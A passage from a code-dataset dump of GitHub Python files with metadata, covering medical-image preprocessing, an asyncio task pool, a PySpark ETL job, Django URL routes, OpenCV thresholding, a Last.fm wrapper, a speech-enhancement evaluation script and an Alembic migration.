dataset[0].get('image').GetPixelIDValue())\n reference_image.SetOrigin(reference_origin)\n reference_image.SetSpacing(reference_spacing)\n reference_image.SetDirection(reference_direction)\n\n # Always use the TransformContinuousIndexToPhysicalPoint to compute an indexed point's physical coordinates as\n # this takes into account size, spacing and direction cosines. 
For the vast majority of images the direction\n # cosines are the identity matrix, but when this isn't the case simply multiplying the central index by the\n # spacing will not yield the correct coordinates resulting in a long debugging session.\n # TODO implement function that takes into account the direction cosine of all images.\n reference_center = np.array(\n reference_image.TransformContinuousIndexToPhysicalPoint(np.array(reference_image.GetSize()) / 2.0))\n\n return reference_image, reference_center, dimension\n", "repo_name": "koenyyy/ImageSegmentationMasterThesisJADS2019_2020Final", "sub_path": "pipeline_for_automated_segmentation_for_further_research/autoSeg/preprocessing/initial_preprocessing.py", "file_name": "initial_preprocessing.py", "file_ext": "py", "file_size_in_byte": 20567, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 26, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "autoSeg.preprocessing.Transform.ResampleVxSpacing", "line_number": 104, "usage_type": "call"}, {"api_name": "autoSeg.preprocessing.Transform.ResampleVxSpacing_no_reference", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 142, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 155, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 155, "usage_type": "name"}, {"api_name": "autoSeg.preprocessing.Transform.N4BiasCorrection", "line_number": 165, "usage_type": "call"}, {"api_name": "autoSeg.preprocessing.Transform.OtsuCrop", "line_number": 166, "usage_type": "call"}, {"api_name": "autoSeg.preprocessing.Transform.IntensityClipper", "line_number": 168, "usage_type": "call"}, {"api_name": "autoSeg.preprocessing.Transform.Normalize", "line_number": 170, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 191, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 192, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 200, "usage_type": "call"}, {"api_name": 
"os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path", "line_number": 207, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "SimpleITK.WriteImage", "line_number": 209, "usage_type": "call"}, {"api_name": "SimpleITK.WriteImage", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 221, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 286, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 297, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 329, "usage_type": "call"}, {"api_name": "SimpleITK.Image", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 374, "usage_type": "call"}]} +{"seq_id": "19115023235", "text": "import logging\nimport asyncio\nfrom asyncio.queues import Queue\n\nlog = logging.getLogger(__name__)\nTERMINATOR = object()\n\n\ndef periodic(loop, delay, fn, *args, **kwargs):\n\n async def _worker():\n while True:\n await fn(*args, **kwargs)\n await asyncio.sleep(delay, loop=loop)\n\n return asyncio.ensure_future(_worker(), loop=loop)\n\n\nclass TaskPool(object):\n def __init__(self, loop, num_workers):\n self.loop = loop\n self.tasks = Queue(loop=self.loop)\n self.workers = []\n for _ in range(num_workers):\n worker = asyncio.ensure_future(self.worker(), loop=self.loop)\n self.workers.append(worker)\n\n async def worker(self):\n while True:\n future, task = await self.tasks.get()\n if task is TERMINATOR:\n break\n try:\n result = await asyncio.wait_for(task, None, loop=self.loop)\n future.set_result(result)\n except Exception as e:\n log.exception(\"task raised exception\")\n future.set_exception(e)\n\n def submit(self, task):\n future = asyncio.Future(loop=self.loop)\n self.tasks.put_nowait((future, task))\n return future\n\n async def join(self):\n for _ in self.workers:\n self.tasks.put_nowait((None, TERMINATOR))\n await asyncio.gather(*self.workers, loop=self.loop)\n", "repo_name": "mdellavo/stream", "sub_path": "stream/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1412, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 14, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 16, "usage_type": "call"}, {"api_name": "asyncio.queues.Queue", "line_number": 
22, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 25, "usage_type": "call"}, {"api_name": "asyncio.wait_for", "line_number": 34, "usage_type": "call"}, {"api_name": "asyncio.Future", "line_number": 41, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "27757390736", "text": "from pyspark import SparkConf, SparkContext\nimport sys\nimport json\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\n\n# parse text to json object\ndef parse2json(line):\n return json.loads(line)\n\n# get only the fields subreddit, score, and author\ndef geInfo(line):\n yield (line[\"subreddit\"], line[\"score\"], line[\"author\"])\n\ndef main(inputs, output):\n # get only data from subreddits that contain an 'e' in their name\n text = sc.textFile(inputs).map(parse2json).flatMap(geInfo).filter(lambda x: 'e' in x[0])\n #text = sc.textFile(inputs).map(parse2json).flatMap(geInfo).filter(lambda x: 'e' in x[0]).cache()\n\n # and the rows with score greater than zero\n text.filter(lambda x: float(x[1]) > 0).map(json.dumps).saveAsTextFile(output + '/positive')\n\n # and the rows with score less than or equal to zero\n text.filter(lambda x: float(x[1]) <= 0).map(json.dumps).saveAsTextFile(output + '/negative')\n\nif __name__ == '__main__':\n conf = SparkConf().setAppName('reddit etl')\n sc = SparkContext(conf=conf)\n sc.setLogLevel('WARN')\n assert sc.version >= '2.4' # make sure we have Spark 2.4+\n inputs = sys.argv[1]\n output = sys.argv[2]\n main(inputs, output)\n", "repo_name": "chuc28/CMPT-732", "sub_path": "Assignment#4/reddit_elt.py", "file_name": "reddit_elt.py", "file_ext": "py", "file_size_in_byte": 1209, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.version_info", "line_number": 4, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 8, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pyspark.SparkConf", "line_number": 26, "usage_type": "call"}, {"api_name": "pyspark.SparkContext", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "26730270727", "text": "from django.conf.urls import url\n\nfrom . 
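The TaskPool in the mdellavo/stream record above is generic; a hypothetical driver (assumed here, not from the record) would look like the sketch below. submit() hands coroutine objects to the worker loop, and join() drains the queue before gathering the workers.

import asyncio

async def square(n):
    await asyncio.sleep(0.01)  # stand-in for real I/O work
    return n * n

loop = asyncio.get_event_loop()
pool = TaskPool(loop, num_workers=4)  # TaskPool as defined in the record above
futures = [pool.submit(square(n)) for n in range(10)]
# join() enqueues one TERMINATOR per worker and waits for the workers to exit;
# every future submitted before that point has been resolved by then.
loop.run_until_complete(pool.join())
print(sorted(f.result() for f in futures))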
import views\n\napp_name= 'accounts'\nurlpatterns = [\n url(r'^signup/$', views.SignUp.as_view(), name='signup'),\n url(r'^profile/$', views.ProfileView, name='profile'),\n url(r'^profile/(?P[a-zA-Z0-9_]+)$', views.ProfileViewOther, name='profile-other'),\n url(r'^profile/edit-profile/$', views.ProfileEdit, name='profile-edit'),\n url(r'^profile/add-post/$', views.addPost, name='add-post'),\n url(r'^profile/edit-profile/profile-pic-change/$', views.prfilepicchange, name='profile-pic'),\n url(r'^profile/(?P[a-zA-Z0-9]+)$', views.ProfileViewOther, name='profile-other'),\n #url(r'^profile/post/create/$', views.ProfilePostCreat, name='PostCreat'),\n #url(r'^profile/post/(?P\\d+)/update/$', views.ProfilePostUpdate, name='PostUpdate'),\n #url(r'^profile/post/(?P\\d+)/delete/$', views.ProfilePostDelete, name='PostDelete '),\n url(r'^profile/(?P[a-zA-Z0-9_]+)$', views.ProfileViewOther, name='profile-other'),\n url(r'^profile/(?P[a-zA-Z0-9_]+)/profile-pic-change/$', views.prfilepicchange, name='profile-pic')\n]\n", "repo_name": "amirmahdiKhosravi/GeeksNegar-Website", "sub_path": "accounts/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "7941817709", "text": "\"\"\"locallibrary URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path,include\nfrom catalog import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n # path('',views.index,name='index')\n \n]\n\nurlpatterns += [\n path('catalog/', include('catalog.urls')), #This is because the url is associated to the particular application \n]\n\n#Add Django site authentication urls (for login, logout, password management)\n\nurlpatterns += [\n path(\"accounts/\", include('django.contrib.auth.urls')),\n path(\"accounts/login/\", include('django.contrib.auth.urls'),name='login'),\n # path(\"accounts/logout/\", include('django.contrib.auth.urls'),name=\"'logout'\"),\n # path(\"accounts/password_change/\", include('django.contrib.auth.urls'),name='password_change'),\n # path(\"accounts/password_change/done/\", include('django.contrib.auth.urls'),name='password_change_done'),\n # path(\"accounts/password_reset/\", include('django.contrib.auth.urls'),name='password_reset'),\n # path(\"accounts/password_reset/done/\", include('django.contrib.auth.urls'),name='password_reset_done'),\n # path(\"accounts/reset///\", include('django.contrib.auth.urls'),name='password_reset_confirm'),\n # path(\"accounts/reset/done/\", include('django.contrib.auth.urls'),name='password_reset_complete'),\n]\n", "repo_name": "cpmakwana28/django_library", "sub_path": "locallibrary/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1932, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "30831748691", "text": "import cv2\n\nimg = cv2.imread('data/pages/test_shadow.png', cv2.IMREAD_GRAYSCALE)\n\nval = 100\n\nimg[img > val] = img[img > val] - val\n\n\nret2,th2 = cv2.threshold(img,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\ncv2.imshow('thresh otsu', th2)\ncv2.waitKey()\n\ncv2.imwrite('doc-images/tresh_shadow.png', th2)\n", "repo_name": "DanielAvram1/handwriting-recognition", "sub_path": "thresholding.py", "file_name": "thresholding.py", "file_ext": "py", "file_size_in_byte": 302, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imread", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 3, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 15, "usage_type": 
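A note on the locallibrary URL configuration above: django.contrib.auth.urls already ships the named routes (login, logout, password_change, password_reset, and the reset-confirm views), so the single include is sufficient and the commented-out per-route includes would only re-register the same module. A minimal equivalent:

from django.urls import include, path

urlpatterns = [
    # Provides /accounts/login/, /accounts/logout/, /accounts/password_reset/,
    # etc., each under its standard name (reverse("login") -> /accounts/login/).
    path("accounts/", include("django.contrib.auth.urls")),
]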
"call"}]} +{"seq_id": "22705476461", "text": "import logging\nfrom typing import Callable, Tuple\n\nimport pylast\n\nimport util\nfrom wrappers import track_info\n\nlogger = logging.getLogger(\"discord_fm\").getChild(__name__)\n\n\nclass LastFMUser:\n _last_request: Tuple[pylast.Track, track_info.TrackInfo] = (None, None)\n\n def __init__(self, manager, inactive_func: Callable = None):\n self.m = manager\n username = self.m.settings.get(\"username\")\n logger.debug(f'Reloading LastFMUser with username \"{username}\"')\n\n if username == \"\":\n raise ValueError(\"Username is empty\")\n\n network = pylast.LastFMNetwork(api_key=\"2cd4164de6a19995e9ff4b59bd17fc20\")\n\n self.username = username\n self.inactive_func = inactive_func\n self.user = network.get_user(username)\n\n def now_playing(self):\n handler = util.request_handler.RequestHandler(\n self.m, \"user's Now Playing\", self.inactive_func\n )\n request = handler.attempt_request(self.user.get_now_playing)\n\n if request == self._last_request[0]:\n return self._last_request[1]\n elif request is not None:\n info = track_info.TrackInfo(self.m, request)\n self._last_request = (request, info)\n return info\n else:\n return None\n\n def check_username(self):\n try:\n handler = util.request_handler.RequestHandler(self.m, \"username validity\")\n handler.attempt_request(self.user.get_now_playing)\n return True\n except pylast.WSError as e:\n if e.details == \"User not found\":\n return False\n", "repo_name": "androidWG/Discord.fm", "sub_path": "src/wrappers/last_fm_user.py", "file_name": "last_fm_user.py", "file_ext": "py", "file_size_in_byte": 1609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 13, "usage_type": "name"}, {"api_name": "pylast.Track", "line_number": 13, "usage_type": "attribute"}, {"api_name": "wrappers.track_info.TrackInfo", "line_number": 13, "usage_type": "attribute"}, {"api_name": "wrappers.track_info", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 15, "usage_type": "name"}, {"api_name": "pylast.LastFMNetwork", "line_number": 23, "usage_type": "call"}, {"api_name": "util.request_handler.RequestHandler", "line_number": 30, "usage_type": "call"}, {"api_name": "util.request_handler", "line_number": 30, "usage_type": "attribute"}, {"api_name": "wrappers.track_info.TrackInfo", "line_number": 38, "usage_type": "call"}, {"api_name": "wrappers.track_info", "line_number": 38, "usage_type": "name"}, {"api_name": "util.request_handler.RequestHandler", "line_number": 46, "usage_type": "call"}, {"api_name": "util.request_handler", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pylast.WSError", "line_number": 49, "usage_type": "attribute"}]} +{"seq_id": "42588237606", "text": "import os\nimport random\nimport soundfile as sf\nimport torch\nimport yaml\nimport json\nimport argparse\nimport pandas as pd\nfrom tqdm import tqdm\nfrom pprint import pprint\nfrom pathlib import Path\nimport torch\ntorch.backends.cudnn.enabled=False\nfrom asteroid.metrics import get_metrics\nfrom asteroid.data.librimix_dataset import LibriMix\nfrom asteroid.losses import PITLossWrapper, pairwise_neg_sisdr\nfrom asteroid.models import DCCRNet_mini\nfrom asteroid.models import save_publishable\nfrom asteroid.utils import tensors_to_device\nfrom asteroid.dsp.normalization import normalize_estimates\nfrom 
asteroid.metrics import WERTracker, MockWERTracker\n\n\n\nCOMPUTE_METRICS = [\"si_sdr\", \"sdr\", \"sir\", \"sar\", \"stoi\",'pesq']\nSAMPLE_RATE = 16000\nn_save_ex = 5\n\n## CLSKD model eval\nmodel_path = '/root/NTH_student/Speech_Enhancement_new/knowledge_distillation_CLSKD/checkpoint/the_best_model.pth'\nex_save_dir = '/root/NTH_student/Speech_Enhancement_new/knowledge_distillation_CLSKD/example_CLSKD'\nresule_dir = '/root/NTH_student/Speech_Enhancement_new/knowledge_distillation_CLSKD/results/All_metric.json'\n\n## SPKD model eval\n#model_path = '/root/NTH_student/Speech_Enhancement_new/knowledge_distillation_CLSKD/checkpoint_SPKD/SPKD_best_model.pth'\n\ndef main():\n wer_tracker = (MockWERTracker())\n model = DCCRNet_mini.from_pretrained(model_path)\n # Handle device placement\n model_device = next(model.parameters()).device\n test_set = LibriMix(\n csv_dir='/root/NTH_student/Speech_Enhancement_new/asteroid/egs/librimix/DCCRNet/data/wav16k/max/test',\n task='enh_single',\n sample_rate=SAMPLE_RATE,\n n_src=1,\n segment=None,\n return_id=True,\n ) # Uses all segment length\n # Used to reorder sources only\n loss_func = PITLossWrapper(pairwise_neg_sisdr, pit_from=\"pw_mtx\")\n save_idx = random.sample(range(len(test_set)), n_save_ex)\n\n series_list = []\n torch.no_grad().__enter__()\n for idx in tqdm(range(len(test_set))):\n # Forward the network on the mixture.\n mix, sources, ids = test_set[idx]\n mix, sources = tensors_to_device([mix, sources], device=model_device)\n est_sources = model(mix.unsqueeze(0))\n loss, reordered_sources = loss_func(est_sources, sources[None], return_est=True)\n mix_np = mix.data.numpy()\n sources_np = sources.data.numpy()\n est_sources_np = reordered_sources.squeeze(0).cpu().data.numpy()\n # For each utterance, we get a dictionary with the mixture path,\n # the input and output metrics\n utt_metrics = get_metrics(\n mix_np,\n sources_np,\n est_sources_np,\n sample_rate=SAMPLE_RATE,\n # metrics_list=COMPUTE_METRICS,\n )\n utt_metrics[\"mix_path\"] = test_set.mixture_path\n est_sources_np_normalized = normalize_estimates(est_sources_np, mix_np)\n utt_metrics.update(\n **wer_tracker(\n mix=mix_np,\n clean=sources_np,\n estimate=est_sources_np_normalized,\n wav_id=ids,\n sample_rate=SAMPLE_RATE,\n )\n )\n series_list.append(pd.Series(utt_metrics))\n\n #save some examples\n # Save some examples in a folder. 
Wav files and metrics as text.\n if idx in save_idx:\n local_save_dir = os.path.join(ex_save_dir, \"ex_{}/\".format(idx))\n os.makedirs(local_save_dir, exist_ok=True)\n sf.write(local_save_dir + \"mixture.wav\", mix_np, SAMPLE_RATE)\n # Loop over the sources and estimates\n for src_idx, src in enumerate(sources_np):\n sf.write(local_save_dir + \"s{}.wav\".format(src_idx), src, SAMPLE_RATE)\n for src_idx, est_src in enumerate(est_sources_np_normalized):\n sf.write(\n local_save_dir + \"s{}_estimate.wav\".format(src_idx),\n est_src,\n SAMPLE_RATE,\n )\n\n # Save all metrics to the experiment folder.\n all_metrics_df = pd.DataFrame(series_list)\n #all_metrics_df.to_csv(os.path.join(eval_save_dir, \"all_metrics.csv\"))\n\n # Print and save summary metrics\n final_results = {}\n for metric_name in COMPUTE_METRICS:\n input_metric_name = \"input_\" + metric_name\n ldf = all_metrics_df[metric_name] - all_metrics_df[input_metric_name]\n final_results[metric_name] = all_metrics_df[metric_name].mean()\n final_results[metric_name + \"_imp\"] = ldf.mean()\n\n print(\"Overall metrics :\")\n pprint(final_results)\n\n with open(resule_dir,'w') as fp:\n json.dump(final_results,fp) \n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "KhanhNguyen4999/Speech-Enhancement-CLSKD", "sub_path": "eval.py", "file_name": "eval.py", "file_ext": "py", "file_size_in_byte": 4666, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.backends", "line_number": 13, "usage_type": "attribute"}, {"api_name": "asteroid.metrics.MockWERTracker", "line_number": 38, "usage_type": "call"}, {"api_name": "asteroid.models.DCCRNet_mini.from_pretrained", "line_number": 39, "usage_type": "call"}, {"api_name": "asteroid.models.DCCRNet_mini", "line_number": 39, "usage_type": "name"}, {"api_name": "asteroid.data.librimix_dataset.LibriMix", "line_number": 42, "usage_type": "call"}, {"api_name": "asteroid.losses.PITLossWrapper", "line_number": 51, "usage_type": "call"}, {"api_name": "asteroid.losses.pairwise_neg_sisdr", "line_number": 51, "usage_type": "argument"}, {"api_name": "random.sample", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 55, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 56, "usage_type": "call"}, {"api_name": "asteroid.utils.tensors_to_device", "line_number": 59, "usage_type": "call"}, {"api_name": "asteroid.metrics.get_metrics", "line_number": 67, "usage_type": "call"}, {"api_name": "asteroid.dsp.normalization.normalize_estimates", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 91, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 92, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 95, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 116, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "73917588353", "text": "\"\"\"update predicates limit\n\nRevision ID: aa709a1d876a\nRevises: 5068aee30aed\nCreate Date: 2021-10-25 15:38:58.526535\n\n\"\"\"\nimport sqlalchemy as 
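The tail of the eval script above averages each metric and its improvement over the noisy input. A toy illustration of that aggregation (made-up numbers, not results from the record):

import pandas as pd

df = pd.DataFrame({
    "si_sdr":       [12.0, 9.0, 15.0],   # metric on the enhanced output
    "input_si_sdr": [ 3.0, 1.0,  5.0],   # same metric on the noisy mixture
})
ldf = df["si_sdr"] - df["input_si_sdr"]
print(df["si_sdr"].mean())  # 12.0 -> final_results["si_sdr"]
print(ldf.mean())           #  9.0 -> final_results["si_sdr_imp"]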
sa\n\nfrom alembic import context, op\n\n# revision identifiers, used by Alembic.\nrevision = \"aa709a1d876a\"\ndown_revision = \"5068aee30aed\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n if context.get_x_argument(as_dictionary=True).get(\"sqlite\", None):\n with op.batch_alter_table(\"dataset\") as batch_op:\n batch_op.drop_column(\"predicates\")\n batch_op.add_column(sa.Column(\"predicates\", sa.Text(20000), nullable=True))\n else:\n op.alter_column(\n \"dataset\",\n \"predicates\",\n existing_type=sa.String(length=500),\n type_=sa.Text(20000),\n existing_nullable=True,\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n if context.get_x_argument(as_dictionary=True).get(\"sqlite\", None):\n with op.batch_alter_table(\"dataset\") as batch_op:\n batch_op.drop_column(\"predicates\")\n batch_op.add_column(\n sa.Column(\"predicates\", sa.String(length=500), nullable=True)\n )\n else:\n op.alter_column(\n \"dataset\",\n \"predicates\",\n existing_type=sa.Text(20000),\n type_=sa.String(length=500),\n existing_nullable=True,\n )\n # ### end Alembic commands ###", "repo_name": "IJtLJZ8Rm4Yr/ymir-backend", "sub_path": "src/pymir-app/alembic/versions/aa709a1d876a_update_predicates_limit.py", "file_name": "aa709a1d876a_update_predicates_limit.py", "file_ext": "py", "file_size_in_byte": 1560, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "alembic.context.get_x_argument", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.context", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 24, "usage_type": "call"}, {"api_name": "alembic.op.alter_column", "line_number": 26, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 26, "usage_type": "name"}, {"api_name": "sqlalchemy.String", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.context.get_x_argument", "line_number": 38, "usage_type": "call"}, {"api_name": "alembic.context", "line_number": 38, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 39, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 39, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 42, "usage_type": "call"}, {"api_name": "alembic.op.alter_column", "line_number": 45, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 45, "usage_type": "name"}, {"api_name": "sqlalchemy.Text", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "27688653098", "text": "from django.urls import path, include\nfrom .views import BillAPI, ComplaintAPI, ResidentAPI, NoticeAPI\n\n\nurlpatterns = [\n path('residentapi//', ResidentAPI.as_view(), name='residentapipk'),\n path('residentapi/', ResidentAPI.as_view(), name='residentapi'),\n path('billapi//', BillAPI.as_view(), name='billapipk'),\n path('billapi/', BillAPI.as_view(), name='billapi'),\n 
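The Alembic migration above branches on an -x argument, and it is worth spelling out how that flag reaches context.get_x_argument(). The invocation below is an assumption of this note, not taken from the record:

# Typical invocation that takes the SQLite branch:
#   alembic -x sqlite=1 upgrade head
from alembic import context

use_sqlite = context.get_x_argument(as_dictionary=True).get("sqlite", None)
# Truthy -> the batch_alter_table path (SQLite cannot ALTER COLUMN in place,
# so the table is rebuilt); falsy -> a plain op.alter_column on engines that can.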
